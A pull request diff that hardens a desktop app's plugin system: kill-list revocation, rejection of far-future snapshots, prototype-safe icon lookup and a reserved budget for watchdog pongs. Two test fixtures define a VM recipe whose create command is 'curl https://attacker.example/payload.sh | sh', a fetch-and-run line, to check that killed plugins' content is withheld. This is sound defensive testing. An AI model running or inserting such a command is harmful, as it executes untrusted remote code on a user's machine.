### PR TITLE
fix(plugins): close four trust-boundary holes in the plugin system

### DIFF
--- a/src/main/plugins/plugin-content-pack-registry.test.ts
+++ b/src/main/plugins/plugin-content-pack-registry.test.ts
@@ -105,4 +105,61 @@ describe('PluginContentPackRegistry', () => {
     expect(registry.languagePacks.list()).toEqual([])
     expect(registry.vmRecipes.list()).toEqual([])
   })
+
+  it('withholds content from a plugin killed during the awaited verification phase', async () => {
+    const rootDir = await mkdtemp(join(tmpdir(), 'orca-plugin-content-pack-kill-race-'))
+    roots.push(rootDir)
+    await Promise.all([mkdir(join(rootDir, 'locales')), mkdir(join(rootDir, 'recipes'))])
+    await Promise.all([
+      writeFile(join(rootDir, 'locales', 'es.json'), JSON.stringify({ settings: 'Ajustes' })),
+      writeFile(
+        join(rootDir, 'recipes', 'vm.json'),
+        JSON.stringify({
+          schemaVersion: 1,
+          id: 'raced-recipe',
+          name: 'Raced Recipe',
+          create: 'curl https://attacker.example/payload.sh | sh'
+        })
+      )
+    ])
+    const manifest = pluginManifestSchema.parse({
+      manifestVersion: 1,
+      id: 'kill-race',
+      publisher: 'orca-samples',
+      name: 'Kill Race',
+      version: '1.0.0',
+      engines: { orca: '>=1.0.0' },
+      pluginApi: 1,
+      contributes: {
+        languagePacks: [{ locale: 'es', path: 'locales/es.json' }],
+        vmRecipes: [{ path: 'recipes/vm.json' }]
+      },
+      capabilities: []
+    })
+    const content = await hashPluginTree(rootDir)
+    if (!content.ok) {
+      throw new Error(content.error)
+    }
+    const plugin: ValidDiscoveredPlugin = {
+      pluginKey: 'orca-samples.kill-race',
+      rootDir,
+      manifest,
+      consentFingerprint: fingerprintPluginConsent(manifest, content.hash),
+      consentContentHash: content.hash,
+      contentHash: null,
+      isDev: true
+    }
+    let killed = false
+    const registry = new PluginContentPackRegistry(new PluginContentVerifier(), () => killed)
+
+    // reconcile() builds its approved-key snapshot synchronously before it
+    // first yields, so flipping the kill list here lands squarely inside the
+    // awaited verification window the final admission gate must re-check.
+    const reconciled = registry.reconcile([plugin], () => true)
+    killed = true
+    await reconciled
+
+    expect(registry.vmRecipes.list()).toEqual([])
+    expect(registry.languagePacks.list()).toEqual([])
+  })
 })

--- a/src/main/plugins/plugin-content-pack-registry.test.ts
+++ b/src/main/plugins/plugin-content-pack-registry.test.ts
@@ -51,7 +51,7 @@ describe('PluginContentPackRegistry', () => {
       contentHash: null,
       isDev: true
     }
-    const registry = new PluginContentPackRegistry(new PluginContentVerifier())
+    const registry = new PluginContentPackRegistry(new PluginContentVerifier(), () => false)
 
     await registry.reconcile([plugin], () => true)
 
@@ -97,7 +97,7 @@ describe('PluginContentPackRegistry', () => {
       contentHash: null,
       isDev: true
     }
-    const registry = new PluginContentPackRegistry(new PluginContentVerifier())
+    const registry = new PluginContentPackRegistry(new PluginContentVerifier(), () => false)
 
     await registry.reconcile([plugin], () => true)
 

--- a/src/main/plugins/plugin-content-pack-registry.ts
+++ b/src/main/plugins/plugin-content-pack-registry.ts
@@ -63,8 +63,13 @@ export class PluginContentPackRegistry {
     )
 
     while (true) {
+      // `approvedKeys` is a snapshot from before the awaited verification
+      // above, so a kill list arriving during that wait would otherwise still
+      // publish. Re-read revocation here, the last gate before publication.
       const approveAtomically = (plugin: ValidDiscoveredPlugin): boolean =>
-        approvedKeys.has(plugin.pluginKey) && !excluded.has(plugin.pluginKey)
+        approvedKeys.has(plugin.pluginKey) &&
+        !excluded.has(plugin.pluginKey) &&
+        !this.isKilled(plugin.pluginKey)
       const languagePacks = this.languagePacks.reconcile(discovered, approveAtomically)
       const vmRecipes = this.vmRecipes.reconcile(discovered, approveAtomically)
       this.commands.reconcile(discovered, approveAtomically, keybindings)

--- a/src/main/plugins/plugin-content-pack-registry.ts
+++ b/src/main/plugins/plugin-content-pack-registry.ts
@@ -16,7 +16,12 @@ export class PluginContentPackRegistry {
   readonly commands: PluginCommandRegistry
   private readonly activationErrors = new Map<string, string>()
 
-  constructor(contentVerifier: PluginContentVerifier) {
+  constructor(
+    contentVerifier: PluginContentVerifier,
+    /** Revocation chokepoint: no caller-supplied predicate can readmit a
+     *  killed plugin's language packs, VM recipes, or commands. */
+    private readonly isKilled: (pluginKey: string) => boolean
+  ) {
     this.languagePacks = new PluginLanguagePackRegistry(contentVerifier)
     this.vmRecipes = new PluginVmRecipeRegistry()
     this.commands = new PluginCommandRegistry()
@@ -30,7 +35,7 @@ export class PluginContentPackRegistry {
     const approvedKeys = new Set(
       discovered
         .filter((plugin): plugin is ValidDiscoveredPlugin => !isInvalidDiscoveredPlugin(plugin))
-        .filter(isApproved)
+        .filter((plugin) => isApproved(plugin) && !this.isKilled(plugin.pluginKey))
         .map((plugin) => plugin.pluginKey)
     )
     const excluded = new Set<string>()

--- a/src/main/plugins/plugin-kill-list-content-revocation.test.ts
+++ b/src/main/plugins/plugin-kill-list-content-revocation.test.ts
@@ -1,0 +1,105 @@
+import { mkdir, mkdtemp, rm, writeFile } from 'node:fs/promises'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import { afterEach, describe, expect, it } from 'vitest'
+import { fingerprintPluginConsent } from '../../shared/plugins/plugin-consent-fingerprint'
+import { pluginManifestSchema, type PluginManifest } from '../../shared/plugins/plugin-manifest'
+import { getApprovedPluginVmRecipes } from './plugin-approved-vm-recipes'
+import { PluginService } from './plugin-service'
+import { hashPluginTree } from './plugin-content-hash'
+
+/** A kill-listed plugin's declarative content must stop reaching the runtime:
+ *  VM recipe `create` strings are executed through spawn(..., { shell: true }). */
+
+const roots: string[] = []
+const services: PluginService[] = []
+const pluginKey = 'orca-samples.recipes'
+
+function contentManifest(): PluginManifest {
+  return pluginManifestSchema.parse({
+    manifestVersion: 1,
+    id: 'recipes',
+    publisher: 'orca-samples',
+    name: 'Recipes',
+    version: '1.0.0',
+    engines: { orca: '>=1.0.0' },
+    pluginApi: 1,
+    contributes: {
+      languagePacks: [{ locale: 'es', path: 'locales/es.json' }],
+      vmRecipes: [{ path: 'recipes/vm.json' }]
+    },
+    capabilities: []
+  })
+}
+
+async function pluginRoot(): Promise<string> {
+  const root = await mkdtemp(join(tmpdir(), 'orca-plugin-kill-content-'))
+  roots.push(root)
+  await Promise.all([mkdir(join(root, 'locales')), mkdir(join(root, 'recipes'))])
+  await Promise.all([
+    writeFile(join(root, 'orca-plugin.json'), JSON.stringify(contentManifest())),
+    writeFile(join(root, 'locales', 'es.json'), JSON.stringify({ settings: 'Ajustes' })),
+    writeFile(
+      join(root, 'recipes', 'vm.json'),
+      JSON.stringify({
+        schemaVersion: 1,
+        id: 'killed-recipe',
+        name: 'Killed Recipe',
+        create: 'curl https://attacker.example/payload.sh | sh'
+      })
+    )
+  ])
+  return root
+}
+
+async function createService(root: string, isKilled: () => boolean): Promise<PluginService> {
+  const content = await hashPluginTree(root)
+  if (!content.ok) {
+    throw new Error(content.error)
+  }
+  const service = new PluginService({
+    userDataPath: root,
+    hostVersion: '1.4.0',
+    isPluginSystemEnabled: () => true,
+    getDisabledPlugins: () => [],
+    getPluginConsents: () => ({
+      [pluginKey]: fingerprintPluginConsent(contentManifest(), content.hash)
+    }),
+    getDevPluginPaths: () => [root],
+    getPluginKillListEntry: (key) =>
+      isKilled() && key === pluginKey ? { pluginKey, reason: 'Malware advisory' } : null
+  })
+  services.push(service)
+  return service
+}
+
+afterEach(async () => {
+  await Promise.all(services.splice(0).map((service) => service.dispose()))
+  await Promise.all(roots.splice(0).map((root) => rm(root, { recursive: true, force: true })))
+})
+
+describe('kill-list revocation of declarative plugin content', () => {
+  it('withdraws VM recipes and language packs when a live plugin is killed', async () => {
+    const root = await pluginRoot()
+    let killed = false
+    const service = await createService(root, () => killed)
+    await service.initialize()
+    expect(await getApprovedPluginVmRecipes(service)).toHaveLength(1)
+
+    killed = true
+    await service.reconcileActivationState()
+
+    expect(await getApprovedPluginVmRecipes(service)).toEqual([])
+    expect(service.contentPacks.languagePacks.list()).toEqual([])
+  })
+
+  it('never publishes killed content after a restart discovers the plugin', async () => {
+    const root = await pluginRoot()
+    const service = await createService(root, () => true)
+
+    await service.initialize()
+
+    expect(await getApprovedPluginVmRecipes(service)).toEqual([])
+    expect(service.contentPacks.languagePacks.list()).toEqual([])
+  })
+})

--- a/src/main/plugins/plugin-kill-list-service.test.ts
+++ b/src/main/plugins/plugin-kill-list-service.test.ts
@@ -79,6 +79,25 @@ describe('PluginKillListService', () => {
     )
   })
 
+  it('keeps accepting genuine lists after a far-future snapshot is published', async () => {
+    const root = await tempRoot()
+    const fetcher = vi
+      .fn<() => Promise<PluginKillList>>()
+      .mockResolvedValueOnce(killList('9999-12-31T23:59:59Z'))
+      .mockResolvedValueOnce(killList('2026-07-12T20:00:00Z'))
+    const service = new PluginKillListService({ pluginsDataDir: root, fetcher })
+
+    await expect(service.refresh()).rejects.toThrow()
+    await expect(service.refresh()).resolves.toMatchObject({
+      generatedAt: '2026-07-12T20:00:00Z'
+    })
+    expect(service.reason('community.unsafe')).toBe('Malware advisory')
+    // The poisoned snapshot must not have been cached for the next launch.
+    const restarted = new PluginKillListService({ pluginsDataDir: root, fetcher })
+    await restarted.initialize()
+    expect(restarted.snapshot()?.generatedAt).toBe('2026-07-12T20:00:00Z')
+  })
+
   it('rejects a replayed older snapshot without replacing cached revocations', async () => {
     const fetcher = vi
       .fn<() => Promise<PluginKillList>>()

--- a/src/main/plugins/plugin-kill-list-service.test.ts
+++ b/src/main/plugins/plugin-kill-list-service.test.ts
@@ -23,6 +23,7 @@ function killList(date = '2026-07-12T20:00:00Z'): PluginKillList {
 }
 
 afterEach(async () => {
+  vi.useRealTimers()
   await Promise.all(roots.splice(0).map((root) => rm(root, { recursive: true, force: true })))
 })
 
@@ -96,6 +97,33 @@ describe('PluginKillListService', () => {
     const restarted = new PluginKillListService({ pluginsDataDir: root, fetcher })
     await restarted.initialize()
     expect(restarted.snapshot()?.generatedAt).toBe('2026-07-12T20:00:00Z')
+  })
+
+  it('keeps cached revocations live when the device clock runs far behind', async () => {
+    const root = await tempRoot()
+    const generatedAt = new Date().toISOString()
+    const published = new PluginKillListService({
+      pluginsDataDir: root,
+      fetcher: async () => killList(generatedAt)
+    })
+    await published.refresh()
+    // A dead RTC / restored VM snapshot must not re-judge an already-accepted
+    // cache against the wrong clock and silently un-revoke a killed plugin.
+    vi.useFakeTimers()
+    vi.setSystemTime(new Date(Date.parse(generatedAt) - 30 * 24 * 60 * 60 * 1000))
+    const restarted = new PluginKillListService({
+      pluginsDataDir: root,
+      fetcher: async () => killList(generatedAt)
+    })
+
+    await restarted.initialize()
+
+    expect(restarted.snapshot()?.generatedAt).toBe(generatedAt)
+    expect(restarted.reason('community.unsafe')).toBe('Malware advisory')
+    // A refresh the skewed clock cannot vouch for is refused, but refusing it
+    // must never downgrade the revocations already in force.
+    await expect(restarted.refresh()).rejects.toThrow()
+    expect(restarted.reason('community.unsafe')).toBe('Malware advisory')
   })
 
   it('rejects a replayed older snapshot without replacing cached revocations', async () => {

--- a/src/main/plugins/plugin-kill-list-service.ts
+++ b/src/main/plugins/plugin-kill-list-service.ts
@@ -1,5 +1,6 @@
 import {
   findKilledPlugin,
+  isPluginKillListTooFarInFuture,
   pluginKillListSchema,
   type PluginKillList,
   type PluginKillListEntry
@@ -75,6 +76,9 @@ export class PluginKillListService {
   private async performRefresh(): Promise<PluginKillList> {
     await this.initialize()
     const fetched = pluginKillListSchema.parse(await this.fetcher())
+    if (isPluginKillListTooFarInFuture(fetched)) {
+      throw new Error('refusing a plugin kill list generated too far in the future')
+    }
     if (
       this.currentList &&
       Date.parse(fetched.generatedAt) < Date.parse(this.currentList.generatedAt)
@@ -127,7 +131,11 @@ export async function fetchPluginKillList(
     offset += chunk.byteLength
   }
   try {
-    return pluginKillListSchema.parse(JSON.parse(new TextDecoder().decode(bytes)))
+    const parsed = pluginKillListSchema.parse(JSON.parse(new TextDecoder().decode(bytes)))
+    if (isPluginKillListTooFarInFuture(parsed)) {
+      throw new Error('generatedAt is too far in the future')
+    }
+    return parsed
   } catch (error) {
     throw new Error(
       `invalid plugin kill-list response: ${error instanceof Error ? error.message : String(error)}`

--- a/src/main/plugins/plugin-service.ts
+++ b/src/main/plugins/plugin-service.ts
@@ -64,7 +64,9 @@ export class PluginService {
 
   constructor(options: PluginServiceOptions) {
     this.options = options
-    this.contentPacks = new PluginContentPackRegistry(this.contentVerifier)
+    this.contentPacks = new PluginContentPackRegistry(this.contentVerifier, (pluginKey) =>
+      Boolean(this.options.getPluginKillListEntry?.(pluginKey))
+    )
     this.audit = new PluginAuditLog(getPluginsDataDir(options.userDataPath))
     this.panels = new PluginPanelController({
       resolveApprovedPlugin: (pluginKey) => {

--- a/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.test.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.test.ts
@@ -1,6 +1,7 @@
+import { Plug } from 'lucide-react'
 import { describe, expect, it } from 'vitest'
 import type { ActivePluginPanel } from '@/store/plugin-panels'
-import { getPluginPanelActivityItems } from './plugin-panel-activity-items'
+import { getPluginPanelActivityItems, resolvePluginPanelIcon } from './plugin-panel-activity-items'
 
 const panel: ActivePluginPanel = {
   id: 'dashboard',
@@ -9,6 +10,27 @@ const panel: ActivePluginPanel = {
   pluginKey: 'orca-samples.demo',
   pluginName: 'Demo'
 }
+
+describe('resolvePluginPanelIcon', () => {
+  it('resolves a curated icon name', () => {
+    expect(resolvePluginPanelIcon('file-text')).toBe(resolvePluginPanelIcon('FileText'))
+  })
+
+  it.each(['constructor', '__proto__', 'toString', 'hasOwnProperty'])(
+    'falls back to Plug for the prototype member %s',
+    (iconName) => {
+      expect(resolvePluginPanelIcon(iconName)).toBe(Plug)
+    }
+  )
+
+  it('keeps a hostile manifest icon renderable by the activity bar', () => {
+    // Object / Object.prototype are not valid React element types: rendering
+    // either throws past the right-sidebar boundary and blanks the whole rail.
+    const item = getPluginPanelActivityItems([{ ...panel, icon: 'constructor' }])[0]!
+    expect(item.icon).not.toBe(Object)
+    expect(item.icon).toBe(Plug)
+  })
+})
 
 describe('getPluginPanelActivityItems', () => {
   it('projects watchdog failure into host-owned activity chrome', () => {

--- a/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.test.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.test.ts
@@ -1,4 +1,4 @@
-import { Plug } from 'lucide-react'
+import { FileText, Plug } from 'lucide-react'
 import { describe, expect, it } from 'vitest'
 import type { ActivePluginPanel } from '@/store/plugin-panels'
 import { getPluginPanelActivityItems, resolvePluginPanelIcon } from './plugin-panel-activity-items'
@@ -12,8 +12,11 @@ const panel: ActivePluginPanel = {
 }
 
 describe('resolvePluginPanelIcon', () => {
-  it('resolves a curated icon name', () => {
-    expect(resolvePluginPanelIcon('file-text')).toBe(resolvePluginPanelIcon('FileText'))
+  it('resolves a curated icon name in both lucide naming styles', () => {
+    const dashed = resolvePluginPanelIcon('file-text')
+    // Without this, the equality below also passes when both sides fall back.
+    expect(dashed).toBe(FileText)
+    expect(resolvePluginPanelIcon('FileText')).toBe(dashed)
   })
 
   it.each(['constructor', '__proto__', 'toString', 'hasOwnProperty'])(

--- a/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.ts
@@ -70,7 +70,11 @@ export function resolvePluginPanelIcon(iconName: string | undefined): PluginPane
   }
   // Accept both lucide naming styles ('file-text' and 'FileText').
   const normalized = iconName.replaceAll('-', '').toLowerCase()
-  return PLUGIN_PANEL_ICONS[normalized] ?? Plug
+  // Own-key only: a manifest icon named `constructor` must not resolve to an
+  // inherited member and crash the sidebar with a non-component "icon".
+  return Object.hasOwn(PLUGIN_PANEL_ICONS, normalized)
+    ? (PLUGIN_PANEL_ICONS[normalized] ?? Plug)
+    : Plug
 }
 
 /** Maps active plugin panel contributions onto right-sidebar activity items. */

--- a/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.test.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.test.ts
@@ -223,26 +223,29 @@ describe('createPanelBridgeMessageHandler', () => {
     expect(panelWindow.postMessage).not.toHaveBeenCalled()
   })
 
-  it('charges pong and invalid guest traffic before parsing either message', () => {
+  it('charges invalid guest traffic to the data budget before parsing it', () => {
     const panelWindow = createFakePanelWindow()
     const admit = vi.fn<PanelMessageBudget['admit']>().mockReturnValue(null)
+    const controlAdmit = vi.fn<PanelMessageBudget['admit']>().mockReturnValue(null)
     const onPong = vi.fn()
     const handler = createPanelBridgeMessageHandler({
       sessionToken: SESSION_TOKEN,
       getPanelWindow: () => panelWindow,
       callPanelAction: vi.fn(),
       onPong,
-      budget: { maxBytes: 1024, admit }
+      budget: { maxBytes: 1024, admit },
+      controlBudget: { maxBytes: 1024, admit: controlAdmit }
     })
 
     handler(messageEvent({ type: 'invalid-hostile-message' }, panelWindow))
     handler(messageEvent({ type: 'orca-panel-pong', pingId: 7 }, panelWindow))
 
-    expect(admit).toHaveBeenCalledTimes(2)
+    expect(admit).toHaveBeenCalledTimes(1)
+    expect(controlAdmit).toHaveBeenCalledTimes(1)
     expect(onPong).toHaveBeenCalledWith(7)
   })
 
-  it('does not accept a pong refused by the rate budget', () => {
+  it('keeps answering the watchdog while the data budget is saturated', () => {
     const panelWindow = createFakePanelWindow()
     const onPong = vi.fn()
     const handler = createPanelBridgeMessageHandler({
@@ -251,6 +254,22 @@ describe('createPanelBridgeMessageHandler', () => {
       callPanelAction: vi.fn(),
       onPong,
       budget: { maxBytes: 1024, admit: () => 'rate_limited' }
+    })
+
+    handler(messageEvent({ type: 'orca-panel-pong', pingId: 7 }, panelWindow))
+
+    expect(onPong).toHaveBeenCalledWith(7)
+  })
+
+  it('does not accept a pong refused by the reserved control budget', () => {
+    const panelWindow = createFakePanelWindow()
+    const onPong = vi.fn()
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken: SESSION_TOKEN,
+      getPanelWindow: () => panelWindow,
+      callPanelAction: vi.fn(),
+      onPong,
+      controlBudget: { maxBytes: 1024, admit: () => 'rate_limited' }
     })
 
     handler(messageEvent({ type: 'orca-panel-pong', pingId: 7 }, panelWindow))

--- a/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.test.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.test.ts
@@ -223,7 +223,7 @@ describe('createPanelBridgeMessageHandler', () => {
     expect(panelWindow.postMessage).not.toHaveBeenCalled()
   })
 
-  it('charges invalid guest traffic to the data budget before parsing it', () => {
+  it('charges every guest frame, pongs included, to the data budget', () => {
     const panelWindow = createFakePanelWindow()
     const admit = vi.fn<PanelMessageBudget['admit']>().mockReturnValue(null)
     const controlAdmit = vi.fn<PanelMessageBudget['admit']>().mockReturnValue(null)
@@ -240,9 +240,32 @@ describe('createPanelBridgeMessageHandler', () => {
     handler(messageEvent({ type: 'invalid-hostile-message' }, panelWindow))
     handler(messageEvent({ type: 'orca-panel-pong', pingId: 7 }, panelWindow))
 
-    expect(admit).toHaveBeenCalledTimes(1)
+    // The pong spends data budget too, so the reserved lane grants liveness
+    // without also granting a free channel for unmetered host work.
+    expect(admit).toHaveBeenCalledTimes(2)
     expect(controlAdmit).toHaveBeenCalledTimes(1)
     expect(onPong).toHaveBeenCalledWith(7)
+  })
+
+  it('charges a near-miss pong to the data budget only, sparing the reserved lane', () => {
+    const panelWindow = createFakePanelWindow()
+    const admit = vi.fn<PanelMessageBudget['admit']>().mockReturnValue(null)
+    const controlAdmit = vi.fn<PanelMessageBudget['admit']>().mockReturnValue(null)
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken: SESSION_TOKEN,
+      getPanelWindow: () => panelWindow,
+      callPanelAction: vi.fn(),
+      onPong: vi.fn(),
+      budget: { maxBytes: 1024, admit },
+      controlBudget: { maxBytes: 1024, admit: controlAdmit }
+    })
+
+    handler(messageEvent({ type: 'orca-panel-pong', pingId: -1 }, panelWindow))
+    handler(messageEvent({ type: 'orca-panel-pong', pingId: 'seven' }, panelWindow))
+    handler(messageEvent({ type: 'orca-panel-pong' }, panelWindow))
+
+    expect(admit).toHaveBeenCalledTimes(3)
+    expect(controlAdmit).not.toHaveBeenCalled()
   })
 
   it('keeps answering the watchdog while the data budget is saturated', () => {
@@ -261,18 +284,46 @@ describe('createPanelBridgeMessageHandler', () => {
     expect(onPong).toHaveBeenCalledWith(7)
   })
 
-  it('does not accept a pong refused by the reserved control budget', () => {
+  it('never lets a panel starve its own watchdog with self-sent pong traffic', () => {
+    const panelWindow = createFakePanelWindow()
+    const onPong = vi.fn()
+    let clock = 0
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken: SESSION_TOKEN,
+      getPanelWindow: () => panelWindow,
+      callPanelAction: vi.fn(),
+      onPong,
+      now: () => clock
+    })
+
+    // A hostile panel floods unsolicited pongs, then the real watchdog reply
+    // for this window arrives. Any per-window count on the reserved lane would
+    // have been spent by the flood and would drop pingId 99.
+    for (let i = 0; i < 500; i += 1) {
+      handler(messageEvent({ type: 'orca-panel-pong', pingId: i }, panelWindow))
+      clock += 1
+    }
+    handler(messageEvent({ type: 'orca-panel-pong', pingId: 99 }, panelWindow))
+
+    expect(onPong).toHaveBeenLastCalledWith(99)
+  })
+
+  it('refuses an oversized frame on the reserved lane', () => {
     const panelWindow = createFakePanelWindow()
     const onPong = vi.fn()
     const handler = createPanelBridgeMessageHandler({
       sessionToken: SESSION_TOKEN,
       getPanelWindow: () => panelWindow,
       callPanelAction: vi.fn(),
-      onPong,
-      controlBudget: { maxBytes: 1024, admit: () => 'rate_limited' }
+      onPong
     })
 
-    handler(messageEvent({ type: 'orca-panel-pong', pingId: 7 }, panelWindow))
+    handler(
+      messageEvent(
+        { type: 'orca-panel-pong', pingId: 7, padding: 'x'.repeat(4 * 1024) },
+        panelWindow
+      )
+    )
 
     expect(onPong).not.toHaveBeenCalled()
   })

--- a/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.ts
@@ -1,12 +1,14 @@
 import {
   PANEL_ACTION_RESULT_TYPE,
   looksLikePanelActionRequest,
+  looksLikePanelControlFrame,
   looksLikePanelPong,
   parsePanelActionRequest,
   type PluginPanelActionOutcome,
   type PluginPanelActionResultMessage
 } from '../../../../shared/plugins/plugin-panel-bridge'
 import {
+  createPanelControlMessageBudget,
   createPanelMessageBudget,
   structuredCloneMessageBytes,
   type PanelMessageBudget
@@ -39,6 +41,8 @@ export type PanelBridgeHostOptions = {
   onPong?: (pingId: number) => void
   /** Injectable for tests; defaults to the shared per-plugin budget. */
   budget?: PanelMessageBudget
+  /** Reserved liveness budget; defaults to the shared control-frame budget. */
+  controlBudget?: PanelMessageBudget
   now?: () => number
 }
 
@@ -65,6 +69,7 @@ export function createPanelBridgeMessageHandler(
   options: PanelBridgeHostOptions
 ): (event: MessageEvent) => void {
   const budget = options.budget ?? createPanelMessageBudget()
+  const controlBudget = options.controlBudget ?? createPanelControlMessageBudget()
   const now = options.now ?? (() => Date.now())
   return (event: MessageEvent): void => {
     const panelWindow = options.getPanelWindow()
@@ -82,6 +87,18 @@ export function createPanelBridgeMessageHandler(
       // Why: targetOrigin must be '*' — an opaque origin never matches a
       // concrete origin, so anything stricter would silently drop the reply.
       requestingWindow.postMessage(message, '*')
+    }
+    // Liveness is charged to its own reserved budget: a panel saturating its
+    // action allowance must still be able to prove it is alive.
+    if (looksLikePanelControlFrame(event.data)) {
+      const controlRefusal = controlBudget.admit(
+        now(),
+        structuredCloneMessageBytes(event.data, controlBudget.maxBytes)
+      )
+      if (!controlRefusal && looksLikePanelPong(event.data)) {
+        options.onPong?.((event.data as { pingId: number }).pingId)
+      }
+      return
     }
     // Budgets run before parsing: a flood of malformed junk must not buy
     // free schema-validation CPU either.
@@ -109,10 +126,6 @@ export function createPanelBridgeMessageHandler(
                 )
         })
       }
-      return
-    }
-    if (looksLikePanelPong(event.data)) {
-      options.onPong?.((event.data as { pingId: number }).pingId)
       return
     }
     if (!looksLikePanelActionRequest(event.data)) {

--- a/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.ts
@@ -1,9 +1,9 @@
 import {
   PANEL_ACTION_RESULT_TYPE,
+  PANEL_CONTROL_MESSAGE_MAX_BYTES,
   looksLikePanelActionRequest,
-  looksLikePanelControlFrame,
-  looksLikePanelPong,
   parsePanelActionRequest,
+  readPanelPongId,
   type PluginPanelActionOutcome,
   type PluginPanelActionResultMessage
 } from '../../../../shared/plugins/plugin-panel-bridge'
@@ -88,15 +88,25 @@ export function createPanelBridgeMessageHandler(
       // concrete origin, so anything stricter would silently drop the reply.
       requestingWindow.postMessage(message, '*')
     }
-    // Liveness is charged to its own reserved budget: a panel saturating its
-    // action allowance must still be able to prove it is alive.
-    if (looksLikePanelControlFrame(event.data)) {
-      const controlRefusal = controlBudget.admit(
-        now(),
-        structuredCloneMessageBytes(event.data, controlBudget.maxBytes)
+    // A valid pong is the one frame the host must never lose: it takes a
+    // reserved lane so a panel saturating its data budget can still prove it
+    // is alive. Only schema-valid pongs qualify, so near-miss pong-shaped junk
+    // cannot drain the lane the real reply needs — it falls through to the
+    // data budget below like any other malformed frame.
+    const pongId = readPanelPongId(event.data)
+    if (pongId !== null) {
+      const timestamp = now()
+      // One walk, capped at the smaller lane bound, serves both budgets: a
+      // pong above that cap is refused here anyway.
+      const pongBytes = structuredCloneMessageBytes(
+        event.data,
+        controlBudget.maxBytes ?? PANEL_CONTROL_MESSAGE_MAX_BYTES
       )
-      if (!controlRefusal && looksLikePanelPong(event.data)) {
-        options.onPong?.((event.data as { pingId: number }).pingId)
+      // Charged to both: the data budget still meters this traffic, while a
+      // refusal there cannot by itself silence liveness.
+      budget.admit(timestamp, pongBytes)
+      if (!controlBudget.admit(timestamp, pongBytes)) {
+        options.onPong?.(pongId)
       }
       return
     }

--- a/src/shared/plugins/plugin-kill-list.test.ts
+++ b/src/shared/plugins/plugin-kill-list.test.ts
@@ -3,8 +3,10 @@ import {
   PLUGIN_KILL_LIST_ENTRY_LIMIT,
   PLUGIN_KILL_LIST_FUTURE_SKEW_MS,
   findKilledPlugin,
+  isPluginKillListTooFarInFuture,
   killedPluginKeys,
-  pluginKillListSchema
+  pluginKillListSchema,
+  type PluginKillList
 } from './plugin-kill-list'
 
 function entry(pluginKey = 'community.unsafe'): Record<string, unknown> {
@@ -58,33 +60,6 @@ describe('pluginKillListSchema', () => {
     expect(pluginKillListSchema.safeParse(killList).success).toBe(false)
   })
 
-  it('rejects a far-future generatedAt that would freeze out later revocations', () => {
-    const parsed = pluginKillListSchema.safeParse({
-      version: 1,
-      generatedAt: '9999-12-31T23:59:59Z',
-      plugins: [entry()]
-    })
-
-    expect(parsed.success).toBe(false)
-    if (!parsed.success) {
-      expect(parsed.error.issues).toEqual(
-        expect.arrayContaining([
-          expect.objectContaining({ message: 'generatedAt is too far in the future' })
-        ])
-      )
-    }
-  })
-
-  it('accepts a generatedAt inside the allowed clock-skew window', () => {
-    expect(
-      pluginKillListSchema.safeParse({
-        version: 1,
-        generatedAt: new Date(Date.now() + PLUGIN_KILL_LIST_FUTURE_SKEW_MS - 60_000).toISOString(),
-        plugins: [entry()]
-      }).success
-    ).toBe(true)
-  })
-
   it('rejects duplicate killed plugin identities', () => {
     const parsed = pluginKillListSchema.safeParse({
       version: 1,
@@ -113,5 +88,21 @@ describe('pluginKillListSchema', () => {
         plugins
       }).success
     ).toBe(false)
+  })
+})
+
+describe('isPluginKillListTooFarInFuture', () => {
+  const list = (generatedAt: string): PluginKillList =>
+    pluginKillListSchema.parse({ version: 1, generatedAt, plugins: [entry()] })
+
+  it('flags a snapshot that would freeze out every later revocation', () => {
+    expect(isPluginKillListTooFarInFuture(list('9999-12-31T23:59:59Z'))).toBe(true)
+  })
+
+  it('allows a snapshot inside the clock-skew window', () => {
+    const generatedAt = new Date(
+      Date.now() + PLUGIN_KILL_LIST_FUTURE_SKEW_MS - 60_000
+    ).toISOString()
+    expect(isPluginKillListTooFarInFuture(list(generatedAt))).toBe(false)
   })
 })

--- a/src/shared/plugins/plugin-kill-list.test.ts
+++ b/src/shared/plugins/plugin-kill-list.test.ts
@@ -1,6 +1,7 @@
 import { describe, expect, it } from 'vitest'
 import {
   PLUGIN_KILL_LIST_ENTRY_LIMIT,
+  PLUGIN_KILL_LIST_FUTURE_SKEW_MS,
   findKilledPlugin,
   killedPluginKeys,
   pluginKillListSchema
@@ -55,6 +56,33 @@ describe('pluginKillListSchema', () => {
     }
   ])('rejects malformed or untrusted fields', (killList) => {
     expect(pluginKillListSchema.safeParse(killList).success).toBe(false)
+  })
+
+  it('rejects a far-future generatedAt that would freeze out later revocations', () => {
+    const parsed = pluginKillListSchema.safeParse({
+      version: 1,
+      generatedAt: '9999-12-31T23:59:59Z',
+      plugins: [entry()]
+    })
+
+    expect(parsed.success).toBe(false)
+    if (!parsed.success) {
+      expect(parsed.error.issues).toEqual(
+        expect.arrayContaining([
+          expect.objectContaining({ message: 'generatedAt is too far in the future' })
+        ])
+      )
+    }
+  })
+
+  it('accepts a generatedAt inside the allowed clock-skew window', () => {
+    expect(
+      pluginKillListSchema.safeParse({
+        version: 1,
+        generatedAt: new Date(Date.now() + PLUGIN_KILL_LIST_FUTURE_SKEW_MS - 60_000).toISOString(),
+        plugins: [entry()]
+      }).success
+    ).toBe(true)
   })
 
   it('rejects duplicate killed plugin identities', () => {

--- a/src/shared/plugins/plugin-kill-list.ts
+++ b/src/shared/plugins/plugin-kill-list.ts
@@ -2,6 +2,8 @@ import { z } from 'zod'
